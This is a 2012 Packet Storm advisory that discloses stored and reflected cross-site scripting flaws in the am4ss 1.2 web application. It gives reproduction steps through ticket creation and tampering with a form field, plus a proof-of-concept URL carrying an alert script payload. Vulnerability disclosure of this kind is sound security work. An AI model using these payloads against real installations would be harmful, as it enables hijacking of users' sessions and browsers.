Am4ss 1.2 Cross Site Scripting

2012-08-03T00:00:00
ID PACKETSTORM:115245
Type packetstorm
Reporter s3n4t00r
Modified 2012-08-03T00:00:00

Description

                                        
                                            `###########################################  
# Exploit Title : am4ss 1.2 <= Multiple Vulnerabilities  
# Author : s3n4t00r  
# Home : Sec-w.com  
# Version : all version  
# Date : Jul 31, 2012  
############################################  
  
XSS Stored [1]  
  
1- Register  
  
2 - Login here [ http://localhost/am4ss/orderdev.php?step=2 ]  
  
3- Create Ticket and add your code html or js  
  
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]  
  
  
XSS Stored [2]  
  
1- Register  
  
2 - Login here [ http://localhost/am4ss/hosting.php?do=order&planid=1&step=6 ]  
  
3- Create Ticket and Change data [ domaine ] using Tamper Data  
  
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]  
  
  
  
  
XSS reflected [1]  
  
here : [ http://localhost/exp/am4ss/misc.php?do=deletemail&mail=(XSS) ]  
  
Example http://localhost/exp/am4ss/misc.php?do=deletemail&mail="><script>alert('Sec-w.com')</script>  
  
  
  
=================================================  
  
Gr34ts 4 : Sec-w.com Members   
  
`